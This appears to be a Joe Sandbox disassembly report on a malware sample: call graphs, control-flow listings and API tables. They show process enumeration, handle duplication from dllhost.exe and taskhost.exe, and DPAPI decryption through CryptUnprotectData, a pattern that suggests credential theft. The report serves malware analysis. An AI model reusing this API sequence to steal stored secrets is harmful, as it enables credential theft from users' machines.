404467 39791->39793 39794 40b273 27 API calls 39792->39794 39793->39784 39796 404475 FreeLibrary 39793->39796 39795 40444f GetProcAddress 39794->39795 39795->39793 39797 404460 39795->39797 39796->39784 39797->39793 39799 4135f6 39798->39799 39800 4135eb FreeLibrary 39798->39800 39799->39111 39800->39799 39802 4449c4 39801->39802 39803 444a52 39801->39803 39804 40b2cc 27 API calls 39802->39804 39803->39128 39803->39129 39805 4449cb 39804->39805 39806 40a804 8 API calls 39805->39806 39807 4449d1 39806->39807 39808 40b273 27 API calls 39807->39808 39809 4449dc GetProcAddress 39808->39809 39810 40b273 27 API calls 39809->39810 39811 4449f3 GetProcAddress 39810->39811 39812 40b273 27 API calls 39811->39812 39813 444a04 GetProcAddress 39812->39813 39814 40b273 27 API calls 39813->39814 39815 444a15 GetProcAddress 39814->39815 39822->39139 39823->39139 39824->39139 39825->39139 39826->39130 39828 403a29 39827->39828 39842 403bed memset memset 39828->39842 39830 403ae7 39855 40b1ab free free 39830->39855 39832 403a3f memset 39836 403a2f 39832->39836 39833 403aef 39833->39147 39834 40a8d0 7 API calls 39834->39836 39835 409d1f 6 API calls 39835->39836 39836->39830 39836->39832 39836->39834 39836->39835 39837 409b98 GetFileAttributesW 39836->39837 39837->39836 39839 40a051 GetFileTime CloseHandle 39838->39839 39840 4039ca CompareFileTime 39838->39840 39839->39840 39840->39147 39841->39146 39843 414c2e 17 API calls 39842->39843 39844 403c38 39843->39844 39845 409719 2 API calls 39844->39845 39846 403c3f wcscat 39845->39846 39847 414c2e 17 API calls 39846->39847 39848 403c61 39847->39848 39849 409719 2 API calls 39848->39849 39850 403c68 wcscat 39849->39850 39856 403af5 39850->39856 39853 403af5 20 API calls 39854 403c95 39853->39854 39854->39836 39855->39833 39857 403b02 39856->39857 39858 40ae18 9 API calls 39857->39858 39866 403b37 39858->39866 39859 403bdb 39860 40aebe FindClose 39859->39860 39862 403be6 39860->39862 39861 40add4 wcscmp wcscmp 39861->39866 39862->39853 39863 40ae18 9 API calls 39863->39866 39864 40ae51 9 API calls 39864->39866 39865 40aebe FindClose 39865->39866 39866->39859 39866->39861 39866->39863 39866->39864 39866->39865 39867 40a8d0 7 API calls 39866->39867 39867->39866 39869 409d1f 6 API calls 39868->39869 39870 404190 39869->39870 39883 409b98 GetFileAttributesW 39870->39883 39872 40419c 39873 4041a7 6 API calls 39872->39873 39874 40435c 39872->39874 39876 40424f 39873->39876 39874->39173 39876->39874 39877 40425e memset 39876->39877 39879 409d1f 6 API calls 39876->39879 39880 40a8ab 9 API calls 39876->39880 39884 414842 39876->39884 39877->39876 39878 404296 wcscpy 39877->39878 39878->39876 39879->39876 39881 4042b6 memset memset _snwprintf wcscpy 39880->39881 39881->39876 39882->39171 39883->39872 39887 41443e 39884->39887 39886 414866 39886->39876 39888 41444b 39887->39888 39889 414451 39888->39889 39890 4144a3 GetPrivateProfileStringW 39888->39890 39891 414491 39889->39891 39892 414455 wcschr 39889->39892 39890->39886 39894 414495 WritePrivateProfileStringW 39891->39894 39892->39891 39893 414463 _snwprintf 39892->39893 39893->39894 39894->39886 39895->39177 39897 40b2cc 27 API calls 39896->39897 39898 409615 39897->39898 39899 409d1f 6 API calls 39898->39899 39900 409625 39899->39900 39925 409b98 GetFileAttributesW 39900->39925 39902 409634 39903 409648 39902->39903 39926 4091b8 memset 39902->39926 39905 40b2cc 27 API calls 39903->39905 39908 408801 39903->39908 39906 40965d 39905->39906 39907 409d1f 6 API calls 39906->39907 39909 40966d 39907->39909 39908->39180 39908->39207 39978 409b98 GetFileAttributesW 39909->39978 39911 40967c 39911->39908 39912 409681 39911->39912 39979 409529 72 API calls 39912->39979 39914 409690 39914->39908 39925->39902 39980 40a6e6 WideCharToMultiByte 39926->39980 39928 409202 39981 444432 39928->39981 39931 40b273 27 API calls 39932 409236 39931->39932 40027 438552 39932->40027 39935 409383 39937 40b273 27 API calls 39935->39937 39936 4251c4 137 API calls 39940 409254 39936->39940 39938 409399 39937->39938 39941 438552 134 API calls 39938->39941 39939 40937b 40034 424f26 123 API calls 39939->40034 39940->39939 40030 4253cf 17 API calls 39940->40030 39959 4093a3 39941->39959 39944 409267 40031 4253cf 17 API calls 39944->40031 39945 4094ff 40038 443d90 39945->40038 39948 4251c4 137 API calls 39948->39959 39949 409273 40032 4253af 17 API calls 39949->40032 39952 4093df 40037 424f26 123 API calls 39952->40037 39953 40927f 39954 4253cf 17 API calls 39954->39959 39958 40951d 39958->39903 39959->39945 39959->39948 39959->39952 39959->39954 39962 4093e4 39959->39962 40035 4253af 17 API calls 39962->40035 39968 4093ed 39978->39911 39979->39914 39980->39928 40059 4438b5 39981->40059 39983 44444c 39984 409215 39983->39984 40073 415a6d 39983->40073 39984->39931 39984->39958 39986 4442e6 11 API calls 39988 44469e 39986->39988 39987 444486 39989 4444b9 memcpy 39987->39989 40026 4444a4 39987->40026 39988->39984 39991 443d90 111 API calls 39988->39991 40077 415258 39989->40077 39991->39984 39992 444524 39993 444541 39992->39993 39994 44452a 39992->39994 40080 444316 39993->40080 39995 416935 16 API calls 39994->39995 39995->40026 40026->39986 40028 438460 134 API calls 40027->40028 40029 409240 40028->40029 40029->39935 40029->39936 40030->39944 40031->39949 40032->39953 40034->39935 40035->39968 40037->39945 40060 4438d0 40059->40060 40070 4438c9 40059->40070 40128 415378 memcpy memcpy 40060->40128 40070->39983 40074 415a77 40073->40074 40075 415a8d 40074->40075 40076 415a7e memset 40074->40076 40075->39987 40076->40075 40078 4438b5 11 API calls 40077->40078 40079 41525d 40078->40079 40079->39992 40081 444328 40080->40081 40082 444423 40081->40082 40083 44434e 40081->40083 40129 4446ea 11 API calls 40082->40129 40084 432d4e 3 API calls 40083->40084 40190 413f4f 40163->40190 40166 413f37 K32GetModuleFileNameExW 40167 413f4a 40166->40167 40167->39237 40169 413969 wcscpy 40168->40169 40170 41396c wcschr 40168->40170 40173 413a3a 40169->40173 40170->40169 40172 41398e 40170->40172 40195 4097f7 wcslen wcslen _memicmp 40172->40195 40173->39237 40175 41399a 40176 4139a4 memset 40175->40176 40177 4139e6 40175->40177 40196 409dd5 GetWindowsDirectoryW wcscpy 40176->40196 40179 413a31 wcscpy 40177->40179 40180 4139ec memset 40177->40180 40179->40173 40197 409dd5 GetWindowsDirectoryW wcscpy 40180->40197 40181 4139c9 wcscpy wcscat 40181->40173 40183 413a11 memcpy wcscat 40183->40173 40185 413cb0 GetModuleHandleW 40184->40185 40186 413cda 40184->40186 40185->40186 40189 413cbf GetProcAddress 40185->40189 40187 413ce3 GetProcessTimes 40186->40187 40188 413cf6 40186->40188 40187->39242 40188->39242 40189->40186 40191 413f2f 40190->40191 40192 413f54 40190->40192 40191->40166 40191->40167 40193 40a804 8 API calls 40192->40193 40194 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40193->40194 40194->40191 40195->40175 40196->40181 40197->40183 40198->39262 40199->39286 40201 409cf9 GetVersionExW 40200->40201 40202 409d0a 40200->40202 40201->40202 40202->39292 40202->39297 40203->39298 40204->39302 40205->39304 40206->39370 40208 40bba5 40207->40208 40252 40cc26 40208->40252 40211 40bd4b 40280 40cc0c 40211->40280 40216 40b2cc 27 API calls 40217 40bbef 40216->40217 40273 40ccf0 40217->40273 40219 40bbf5 40219->40211 40277 40ccb4 40219->40277 40222 40cf04 17 API calls 40223 40bc2e 40222->40223 40224 40bd43 40223->40224 40225 40b2cc 27 API calls 40223->40225 40226 40cc0c 4 API calls 40224->40226 40227 40bc40 40225->40227 40226->40211 40228 40ccf0 _wcsicmp 40227->40228 40229 40bc46 40228->40229 40229->40224 40230 40bc61 memset memset WideCharToMultiByte 40229->40230 40287 40103c strlen 40230->40287 40232 40bcc0 40233 40b273 27 API calls 40232->40233 40234 40bcd0 memcmp 40233->40234 40234->40224 40235 40bce2 40234->40235 40236 404423 38 API calls 40235->40236 40237 40bd10 40236->40237 40237->40224 40238 40bd3a LocalFree 40237->40238 40239 40bd1f memcpy 40237->40239 40238->40224 40239->40238 40240->39385 40241->39422 40242->39422 40243->39422 40244->39422 40245->39422 40246->39422 40247->39422 40248->39422 40249->39422 40250->39397 40251->39419 40288 4096c3 CreateFileW 40252->40288 40254 40cc34 40255 40cc3d GetFileSize 40254->40255 40263 40bbca 40254->40263 40256 40afcf 2 API calls 40255->40256 40257 40cc64 40256->40257 40289 40a2ef ReadFile 40257->40289 40259 40cc71 40290 40ab4a MultiByteToWideChar 40259->40290 40261 40cc95 CloseHandle 40262 40b04b ??3@YAXPAX 40261->40262 40262->40263 40263->40211 40264 40cf04 40263->40264 40265 40b633 free 40264->40265 40266 40cf14 40265->40266 40296 40b1ab free free 40266->40296 40268 40cf1b 40269 40cfef 40268->40269 40272 40bbdd 40268->40272 40297 40cd4b 40268->40297 40271 40cd4b 14 API calls 40269->40271 40271->40272 40272->40211 40272->40216 40274 40ccfd 40273->40274 40276 40cd3f 40273->40276 40275 40cd26 _wcsicmp 40274->40275 40274->40276 40275->40274 40275->40276 40276->40219 40278 40aa29 6 API calls 40277->40278 40279 40bc26 40278->40279 40279->40222 40281 40b633 free 40280->40281 40282 40cc15 40281->40282 40283 40aa04 free 40282->40283 40284 40cc1d 40283->40284 40346 40b1ab free free 40284->40346 40286 40b7d4 memset CreateFileW 40286->39377 40286->39378 40287->40232 40288->40254 40289->40259 40291 40ab93 40290->40291 40292 40ab6b 40290->40292 40291->40261 40293 40a9ce 4 API calls 40292->40293 40294 40ab74 40293->40294 40295 40ab7c MultiByteToWideChar 40294->40295 40295->40291 40296->40268 40298 40cd7b 40297->40298 40331 40aa29 40298->40331 40300 40cef5 40301 40aa04 free 40300->40301 40302 40cefd 40301->40302 40302->40268 40304 40aa29 6 API calls 40305 40ce1d 40304->40305 40306 40aa29 6 API calls 40305->40306 40307 40ce3e 40306->40307 40308 40ce6a 40307->40308 40339 40abb7 wcslen memmove 40307->40339 40309 40ce9f 40308->40309 40342 40abb7 wcslen memmove 40308->40342 40312 40a8d0 7 API calls 40309->40312 40315 40ceb5 40312->40315 40313 40ce56 40340 40aa71 wcslen 40313->40340 40314 40ce8b 40343 40aa71 wcslen 40314->40343 40319 40a8d0 7 API calls 40315->40319 40318 40ce5e 40341 40abb7 wcslen memmove 40318->40341 40322 40cecb 40319->40322 40320 40ce93 40344 40abb7 wcslen memmove 40320->40344 40345 40d00b malloc memcpy free free 40322->40345 40325 40cedd 40326 40aa04 free 40325->40326 40327 40cee5 40326->40327 40328 40aa04 free 40327->40328 40329 40ceed 40328->40329 40330 40aa04 free 40329->40330 40330->40300 40332 40aa33 40331->40332 40333 40aa63 40331->40333 40334 40aa44 40332->40334 40335 40aa38 wcslen 40332->40335 40333->40300 40333->40304 40336 40a9ce 4 API calls 40334->40336 40335->40334 40337 40aa4d 40336->40337 40337->40333 40338 40aa51 memcpy 40337->40338 40338->40333 40339->40313 40340->40318 40341->40308 40342->40314 40343->40320 40344->40309 40345->40325 40346->40286 40347->39437 40348->39445 40349 441819 40352 430737 40349->40352 40351 441825 40353 430756 40352->40353 40365 43076d 40352->40365 40354 430774 40353->40354 40355 43075f 40353->40355 40366 43034a 40354->40366 40377 4169a7 11 API calls 40355->40377 40358 4307ce 40360 430819 memset 40358->40360 40370 415b2c 40358->40370 40359 43077e 40359->40358 40363 4307fa 40359->40363 40359->40365 40360->40365 40362 4307e9 40362->40360 40362->40365 40378 4169a7 11 API calls 40363->40378 40365->40351 40367 43034e 40366->40367 40369 430359 40366->40369 40379 415c23 memcpy 40367->40379 40369->40359 40371 415b46 40370->40371 40372 415b42 40370->40372 40371->40362 40372->40371 40373 415b94 40372->40373 40375 415b5a 40372->40375 40374 4438b5 10 API calls 40373->40374 40374->40371 40375->40371 40376 415b79 memcpy 40375->40376 40376->40371 40377->40365 40378->40365 40379->40369 40380 41493c EnumResourceNamesW

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                      APIs
                                                      • memset.MSVCRT ref: 0040DDAD
                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                      • memset.MSVCRT ref: 0040DF5F
                                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                      • String ID: dllhost.exe$p+Fw@FFw@BFw$taskhost.exe$taskhostex.exe
                                                      • API String ID: 708747863-4209158791
                                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 586 413eb7-413ebd 583->586 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 586->587 588 413ebf-413ec6 free 586->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                                                      APIs
                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                      • memset.MSVCRT ref: 00413D7F
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                      • memset.MSVCRT ref: 00413E07
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                      • free.MSVCRT ref: 00413EC1
                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                      • API String ID: 1344430650-1740548384
                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                      • String ID: AE$BIN
                                                      • API String ID: 1668488027-3931574542
                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                      APIs
                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                      • String ID:
                                                      • API String ID: 767404330-0
                                                      • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                      • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileFind$FirstNext
                                                      • String ID:
                                                      • API String ID: 1690352074-0
                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                      APIs
                                                      • memset.MSVCRT ref: 0041898C
                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: InfoSystemmemset
                                                      • String ID:
                                                      • API String ID: 3558857096-0
                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 